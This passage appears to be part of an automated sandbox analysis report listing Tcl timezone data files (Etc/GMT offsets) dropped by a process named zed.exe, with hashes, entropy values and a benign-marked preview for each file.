                                                                                                                                                                                                                                            SHA-256:AD5833153446960BDE0653A22AE2111BF80CFD61C3010993CE87B81D40C75C72
                                                                                                                                                                                                                                            SHA-512:A1B2A153834FEAD7DC27C0918E1B1CB905671F82850C1CAAEBD89F5535703FB259F02F699EA7F82F3044E37668EE93DFA4D4EB862CD437AFF0DABA84867B1963
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+2) {.. {-9223372036854775808 -7200 0 -02}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):117
                                                                                                                                                                                                                                            Entropy (8bit):4.949132511023475
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDOFfMXGm2OHBFVGAvFv:SlSWB9eg/yRSlDm2OHBFAKV
                                                                                                                                                                                                                                            MD5:5C6F16F2CFD46030688066F9BFBE675D
                                                                                                                                                                                                                                            SHA1:1DB5F36584822EB92E75B9AC9F440FD671BD90AE
                                                                                                                                                                                                                                            SHA-256:C7BEE4C71905EDDB40BAF42C0CD0DC70BB9F298EAAB8B9367D484B8431DD084A
                                                                                                                                                                                                                                            SHA-512:FFB2C4CD8EA7DE165C3D989454898FF2023D1A1E3B2B34EC23B1B71EFA7BF2538488DA0069E59F1152B8933D2263B762D2D7C56ADBED826C33FC0BA6672E34DB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+3) {.. {-9223372036854775808 -10800 0 -03}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):117
                                                                                                                                                                                                                                            Entropy (8bit):4.971627677226461
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDOqJMXGm2OHBvGQy:SlSWB9eg/yRSQDm2OHBON
                                                                                                                                                                                                                                            MD5:E35244C1A6084C7BC1D79E437677C55C
                                                                                                                                                                                                                                            SHA1:898619DA4B8B9AC72E69C7BD30DEA2ADEF9440FE
                                                                                                                                                                                                                                            SHA-256:26D1EF512CC5797FC63BA2B83C7D6271025F4D4F5C904D9FA8E97F053393D9A7
                                                                                                                                                                                                                                            SHA-512:0687758558C4C5FF7802F3A57212694A1515761A8337D4B75FFE81434D2AD8A221B005DEC36BF013F2FC3DE1E46DFBED36352811EB7C5A5AE3A167A2E314F57C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+4) {.. {-9223372036854775808 -14400 0 -04}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):117
                                                                                                                                                                                                                                            Entropy (8bit):4.956438091983076
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDOJNMXGm2OHLVvyV6Aov:SlSWB9eg/yRSDDm2OHLVKVg
                                                                                                                                                                                                                                            MD5:7C560A0F3C42E399AC1247CB6C516DC6
                                                                                                                                                                                                                                            SHA1:C314B09D4E369C69C23A8DC1FB066FD0CFDC7211
                                                                                                                                                                                                                                            SHA-256:054910BDDFC44D9B806BBD3008C30547FA57ECD3C043418C406A725158144688
                                                                                                                                                                                                                                            SHA-512:FCE8431B759BD5359847734FD98D9D91394916235B2AF587FC927D5F3196FB283E241A6A9200EA852F9265ECEF81402FF6ACD0FA3A4AAEF6DF9DB1B056B3A9EF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+5) {.. {-9223372036854775808 -18000 0 -05}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):117
                                                                                                                                                                                                                                            Entropy (8bit):4.974743300958087
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDOAkSMXGm2OHvTmULyn:SlSWB9eg/yRSbSDm2OHviX
                                                                                                                                                                                                                                            MD5:EEB1A3E0FD3339E332587D19C116D4EF
                                                                                                                                                                                                                                            SHA1:5DBF046031CD354B1EF88E46D3FED74706D21AC6
                                                                                                                                                                                                                                            SHA-256:D53BB247E0E429A6243AB9A9BDCAE1EE1CF5F271D79748A843631906AB63A988
                                                                                                                                                                                                                                            SHA-512:07BDF9056DC335C773684E634B1D389FBD139464D4597DE862B7EAC096676A093934682BF911F4E68F299789931218C0E431F0CC6BEBD7275B5FC8015EDD0942
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+6) {.. {-9223372036854775808 -21600 0 -06}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):117
                                                                                                                                                                                                                                            Entropy (8bit):4.930134062078826
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDONeyFNMXGm2OHrXVYVny:SlSWB9eg/yRSNPDm2OHriVy
                                                                                                                                                                                                                                            MD5:F92B31548D6BF8CCFA326C0CA6E205A0
                                                                                                                                                                                                                                            SHA1:3FFC6C214EDBCBE9C2509306CE73B429113E1C8A
                                                                                                                                                                                                                                            SHA-256:6BA5779E35D581B409F53B14B6E28ECC16F536FFEDD45DDBC8DAE4B8C28F66E7
                                                                                                                                                                                                                                            SHA-512:317872E986099D02AF083397AE936854043D54CEBF45A70672F02DDC9E2F3B27BC3FA80902F9675131C51A09BBD3C2BD1CD437330935CEA113C643769E0DF20C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+7) {.. {-9223372036854775808 -25200 0 -07}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):117
                                                                                                                                                                                                                                            Entropy (8bit):4.915798027862021
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDOOF3vXMXGm2OHmFvGpn:SlSWB9eg/yRSqfXDm2OHaOp
                                                                                                                                                                                                                                            MD5:B31B15E6006F8DF0D7627D6C90FF39AF
                                                                                                                                                                                                                                            SHA1:7C4137BE11DA84771DF6DC5EBC32D5E5E87E060F
                                                                                                                                                                                                                                            SHA-256:CA87559B154B165E83482AEE3D753BA8E38ABCA347A005E8504C566433CF4CB3
                                                                                                                                                                                                                                            SHA-512:220F7E7379EABBC8ACD7ADBB7A4AC8E93E4B268F8F1C0965B7E6A09735EE86E293EF1C492990331EEB4176B8301A91EC20579756B962AE45C858A96C09349CCD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+8) {.. {-9223372036854775808 -28800 0 -08}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):117
                                                                                                                                                                                                                                            Entropy (8bit):4.95764928386407
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDO3fMXGm2OHNms:SlSWB9eg/yRSPDm2OHNms
                                                                                                                                                                                                                                            MD5:5B10173EB7119F1219250763504A3526
                                                                                                                                                                                                                                            SHA1:A845021437C4638079040EF27AEF163C865FF8F8
                                                                                                                                                                                                                                            SHA-256:A0987A1D078B0993FB3B07208E3F4538A2319DCDDDEB2FAEA32FC463DEAFB8DB
                                                                                                                                                                                                                                            SHA-512:D213285D0A723B7771263122AFA269C2ABD0325A97D32C3870341255C06597DD6851C22860CFF42BF54E3FF5A36FC88C306F3BF1C69E7BD7FD7F69FE7601ED1A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT+9) {.. {-9223372036854775808 -32400 0 -09}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):159
                                                                                                                                                                                                                                            Entropy (8bit):4.898210849752128
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/yRDIyHp8RDMovn:SlSWB9vsM3yFXHAIgnvVHN/yRUyJ8RQy
                                                                                                                                                                                                                                            MD5:5AFB7F12BA056619252D48904523DFA9
                                                                                                                                                                                                                                            SHA1:CD6E6681C8302BF38095975DF556BD14959FDAC8
                                                                                                                                                                                                                                            SHA-256:EFF27B3DEE9306641FF344801E06BB33FF768CDCCFE2409FA8AF752FF6D39F66
                                                                                                                                                                                                                                            SHA-512:2869BB347F42667A3D174816466B15916FC61FCB5A6A1BE1DD750C5C1751602FEE0FE5A27651B7A19C9F6764872DD0F00D3D5AA16CA1A743DBA09646D25A4EB2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:Etc/GMT-0) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):115
                                                                                                                                                                                                                                            Entropy (8bit):4.979902281541545
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDI/fMXGm2OHMKUrn:SlSWB9eg/yRUXDm2OHtUr
                                                                                                                                                                                                                                            MD5:4000096844091488200125FC8F50E2F5
                                                                                                                                                                                                                                            SHA1:9FFEAE66405CFB254180C7DBE185288791DFEE5F
                                                                                                                                                                                                                                            SHA-256:B4BF883FBE9246EF4079179A746B1F9E59F2C77D4F598794B60732D198DC6044
                                                                                                                                                                                                                                            SHA-512:25C69E04018C2978A2E5748F0D3C61157453D998C16FA4B3C257A6515B87F5FD2B754893B47604BBC60AB60B60BA162BF2D1463E616E72CB8713C736F1B4D428
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-1) {.. {-9223372036854775808 3600 0 +01}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):117
                                                                                                                                                                                                                                            Entropy (8bit):4.964101313797091
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDINFeyFNMXGm2OHMUUMy:SlSWB9eg/yRUN5XDm2OHXFy
                                                                                                                                                                                                                                            MD5:AE6601FACF6BE1E68083F8D353901181
                                                                                                                                                                                                                                            SHA1:8B3BFA307D2A94BADD3A1A5E42545D6F7C620BCE
                                                                                                                                                                                                                                            SHA-256:EF3046D7789CAE069B5473D053F3EF0157248F8A359A1282EE02BA613A75FC94
                                                                                                                                                                                                                                            SHA-512:1859E6A2CB94EFEE7CD5C17803AA4F2DEEBE4DCF43D3B1EA737DF00BA86ECEC79D296D75E69D5829DECB48380B6B650724104FFA7959FD18FE032DF7D002A88B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-10) {.. {-9223372036854775808 36000 0 +10}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):117
                                                                                                                                                                                                                                            Entropy (8bit):5.00162575418652
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDIVSMXGm2OHlVVtyn:SlSWB9eg/yRUVSDm2OHlVLy
                                                                                                                                                                                                                                            MD5:D864BA451C9E441BF47D233626C57B99
                                                                                                                                                                                                                                            SHA1:6C38E6F8BA292575C496124572D187F97C9F8E73
                                                                                                                                                                                                                                            SHA-256:CCDEADBD18BE81E59A669A460A14AFCBFF733C3A5D164FC2B6B93DEAF009B78A
                                                                                                                                                                                                                                            SHA-512:5C16BD1189F3FE6789CB3630C841FD168EC87D0498EE6FCC4C8D635F8CF4BCAF0558B44F859C37E418F6BC5A7F6693D6EF1DD218A1DB6DA2D54FF55916685119
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-11) {.. {-9223372036854775808 39600 0 +11}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):117
                                                                                                                                                                                                                                            Entropy (8bit):4.978079707159482
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDIjbNMXGm2OHwvv0UIoAov:SlSWB9eg/yRUjJDm2OHwvv0YAov
                                                                                                                                                                                                                                            MD5:C3E7748C7CB9D8A7F7FA5170D5098983
                                                                                                                                                                                                                                            SHA1:54F5374A32173BEC6EDA430745DCD18749ABC233
                                                                                                                                                                                                                                            SHA-256:23B61B18C653E25F7245B0BB6E04AD347E038585B145962FD1EEACE26F118D54
                                                                                                                                                                                                                                            SHA-512:4783A7CD4C94CCC67C1C71F9C5D9CD99A3918EA4792D8CE2443ACE8F034B9023EBC02405B5DEAB919AA35FD1FD29D8980774316AC96D32ECDEBEFA15BBE6878D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-12) {.. {-9223372036854775808 43200 0 +12}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):117
                                                                                                                                                                                                                                            Entropy (8bit):4.994320173226919
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDIaMXGm2OH1dNv7Dy:SlSWB9eg/yRUaDm2OHty
                                                                                                                                                                                                                                            MD5:224AAAA8A31C283F50149A090E3970D5
                                                                                                                                                                                                                                            SHA1:E7E4876EC2474FEFD82D4B174CA8E3A3427062F5
                                                                                                                                                                                                                                            SHA-256:A9F1AD5A7CB5ED43C5E6E8A7A9B887329890ABB75B9FC9483B8543A367457EBE
                                                                                                                                                                                                                                            SHA-512:6EE0C6F519AAB2DAA3F7D802F0F838BA9F6BF1D56530000D3C9EA4FDA81DCB9832A3285E36208F29EEB23C27EC5BFD3438DC272929A7531268B7C0626A65D6A5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-13) {.. {-9223372036854775808 46800 0 +13}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):117
                                                                                                                                                                                                                                            Entropy (8bit):4.9895752453470585
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDIxhfMXGm2OH0FVtXvFv:SlSWB9eg/yRUxJDm2OH8jNv
                                                                                                                                                                                                                                            MD5:8ADF71739DCADE63433B7BF8321EAC77
                                                                                                                                                                                                                                            SHA1:AA6BDE83FF0D8BCFDE0426160250F2D17D3AF81D
                                                                                                                                                                                                                                            SHA-256:A37A7160027BD38356764C4D1AA5B9B17F8D5DC3CFB81EF2ED399E44C41734CE
                                                                                                                                                                                                                                            SHA-512:AEE3929DE269ADB5265A54841F041E41595359C101539F6309A4E737E3F5DF0BC91560781C7118975398C29A084113682C78F66E07E2E4AC5EAC8DFC33C4F0ED
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-14) {.. {-9223372036854775808 50400 0 +14}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):115
                                                                                                                                                                                                                                            Entropy (8bit):4.921164129348819
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDInWNMXGm2OH/VXF9:SlSWB9eg/yRUnSDm2OH/Vb
                                                                                                                                                                                                                                            MD5:CABB864F4E76B90928F5C54CD9334DEB
                                                                                                                                                                                                                                            SHA1:4818D47F83F16B9F7612D1E979B2440C170ECDB9
                                                                                                                                                                                                                                            SHA-256:7211BF8329B2388563ED8FA8C5140099A171B8A303A9473E9A6F3AF0C5D239CB
                                                                                                                                                                                                                                            SHA-512:1FDCB05D675F1D28CB52B9F5EAC7EC52FDF2CE7E7411740A6F8FB5E9D443ED636CE268E3AF9E08605CC3E13A49B2D86FF4EA6A85F518D5C79E263BA94263361D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-2) {.. {-9223372036854775808 7200 0 +02}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):116
                                                                                                                                                                                                                                            Entropy (8bit):4.948161547682094
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDIYyXMXGm2OHkNsWYcv:SlSWB9eg/yRUlDm2OHkKWYe
                                                                                                                                                                                                                                            MD5:4AE5F29A13A86E4A7064E9200668E43B
                                                                                                                                                                                                                                            SHA1:2460BD1BB0FF3A3C774A5C7CC3DA10235DA06B0D
                                                                                                                                                                                                                                            SHA-256:BFC86D65B0B94725DCE4C88EDC4300141ABBCA4B6CDECF037C437DF49F0C1D6A
                                                                                                                                                                                                                                            SHA-512:190DC38B4A20F964C967866507086317D85D979DFCFA415D1569C485C6476024922BC6E7103273C41889D9D7B22E97933F286FCF4D341248077C1BA777D0EE3B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-3) {.. {-9223372036854775808 10800 0 +03}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):116
                                                                                                                                                                                                                                            Entropy (8bit):4.970850637731657
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDIQXMXGm2OHkVsRYovV:SlSWB9eg/yRUQXDm2OHkSN
                                                                                                                                                                                                                                            MD5:BBAF760E27C02D176A675AC3CF2D1E6D
                                                                                                                                                                                                                                            SHA1:E524FAA7D424A1C1545D1D8EC00169125A68E8E5
                                                                                                                                                                                                                                            SHA-256:02E2EEAF88EE179EF63DD29ACC7384A4B46DE1E3A151C1F3A5DD31BBB5A05AEE
                                                                                                                                                                                                                                            SHA-512:6AC7CC0E52E7793C7F2D3DDA9551709DEAE654C1182EAD7108D04F1BAAAB7E1C473B6E8A3A126B0E421D8A246294A03B2EE9E070330924502DF2869CC61C37F7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-4) {.. {-9223372036854775808 14400 0 +04}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):116
                                                                                                                                                                                                                                            Entropy (8bit):4.955530107787899
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDI7tNMXGm2OHM0VQVFv:SlSWB9eg/yRU7PDm2OHnVQVV
                                                                                                                                                                                                                                            MD5:17F64A5969D3755211E60C0A9F83974F
                                                                                                                                                                                                                                            SHA1:FEFA84725EFAE6405F43797296C342B974F2D272
                                                                                                                                                                                                                                            SHA-256:3A2C75DCA11D1167126F0D44A8682420FAF75B0B82B3DCFC35A9F028A9A759E8
                                                                                                                                                                                                                                            SHA-512:77DBCD8284A470E4869976E2E8A5EDE28104283F120C863785A6B2E64CF87E06243196817C0055A9B32D6FFFE94A25772F67D58BF8E885F7EC06C34FABE38766
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-5) {.. {-9223372036854775808 18000 0 +05}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):116
                                                                                                                                                                                                                                            Entropy (8bit):4.973993120288556
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDIg3fMXGm2OHETNSTVVn:SlSWB9eg/yRUgPDm2OHETMX
                                                                                                                                                                                                                                            MD5:51CAF7956E133C8A9788AE0B8C6145AB
                                                                                                                                                                                                                                            SHA1:47F8B49DF9ED477BD95F908693A483AE4FDE881F
                                                                                                                                                                                                                                            SHA-256:D22C87321373EC0EFB0F312925476CD0747323EF303E17621A871BF814C8ABB1
                                                                                                                                                                                                                                            SHA-512:EC4B4BE74C1BA64DEC8EF11DAAA338C52BD67D55E8A2352FBC6C83FA142F8DBE424CC1110E9A9D9A891E1E858D1FFA6D1E3B997D41BBB374556FA1F9A708559E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-6) {.. {-9223372036854775808 21600 0 +06}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):116
                                                                                                                                                                                                                                            Entropy (8bit):4.928999319005163
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDIpdNMXGm2OHAXUVSYovV:SlSWB9eg/yRURDm2OHAXUVSYyV
                                                                                                                                                                                                                                            MD5:56D88B54CA33B43E2E7D3EA6AD3A4D6E
                                                                                                                                                                                                                                            SHA1:9351E0C001C5D83325281AF54363D76D65548B7D
                                                                                                                                                                                                                                            SHA-256:70CB3A766A2E84148B68613D68687D263D3592ED4B6E672797FB20801ECA8231
                                                                                                                                                                                                                                            SHA-512:32B58AD16F64590903C7AB49BA4890DAF6F1F3D33187A7654D3DA88A1C0047483EAA58B2498D824A30116E235FCC8F8FB3FADD57F86396240E5D92B2CA337027
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-7) {.. {-9223372036854775808 25200 0 +07}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):116
                                                                                                                                                                                                                                            Entropy (8bit):4.9145396982864895
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDIlSMXGm2OHN/VsdYLyn:SlSWB9eg/yRUlSDm2OHUp
                                                                                                                                                                                                                                            MD5:E462AD5E0C046EA6769EDB4B2C80F4D4
                                                                                                                                                                                                                                            SHA1:6DDB94485648622875E0927BA1E8CFE67CEC1382
                                                                                                                                                                                                                                            SHA-256:80C85D59416CEC91DB3DAC5FDD2FD7B91D6FC74A37BBBEF6FF58F6F6816E8FC9
                                                                                                                                                                                                                                            SHA-512:42734FD2DA8BD6E0BC271FF1375A31DEB72EED85AB5EA6E1E0F81EE4E3E7E74380FFC98FAC30409684F736DB580AAAF4F62DB4757AA35C10383584F6144EF363
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-8) {.. {-9223372036854775808 28800 0 +08}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):116
                                                                                                                                                                                                                                            Entropy (8bit):4.956751740978211
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRDIeyXMXGm2OHENScFAy:SlSWB9eg/yRUPDm2OHsScr
                                                                                                                                                                                                                                            MD5:98F70EC1B1AC7D38CB8D01705FB0CA56
                                                                                                                                                                                                                                            SHA1:EDAFA132E48935ACEB8E72D3FF463E4FC857C1A9
                                                                                                                                                                                                                                            SHA-256:57395BB968AFA5A041EADA4B684B82F0379A9333F9522D69F069A79FDEA2B8D7
                                                                                                                                                                                                                                            SHA-512:97B8D7603D6B54C075B005B905B2A7A28B8BEA67894F055663C44D2BF730BB937AC8EF5B2DF182BDD2D9EFFDBD135DF9467C813AEE39AA6B34256908A12DC011
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/GMT-9) {.. {-9223372036854775808 32400 0 +09}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):158
                                                                                                                                                                                                                                            Entropy (8bit):4.886484135647838
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/yRDVMFHp8RDMovn:SlSWB9vsM3yFXHAIgnvVHN/yRC1p8RQy
                                                                                                                                                                                                                                            MD5:F879FB24EA976394B8F4FAF1A9BF268C
                                                                                                                                                                                                                                            SHA1:903714237EBD395A27EAF00B3DAAA89131267EE5
                                                                                                                                                                                                                                            SHA-256:AB742F93BE44BD68AB8FE84505FA28120F1808765D9BAED32A3490AF7C83D35B
                                                                                                                                                                                                                                            SHA-512:F5EE4C331E37036516F2A1BF12F2E088B2E2C7F6475127BF4E7B4937F864550D64D570BC855B6058D4311755E8696EC42095A36AEF13BB29E62192EE0AFB6EAF
                                                                                                                                                                                                                                            Malicious:false
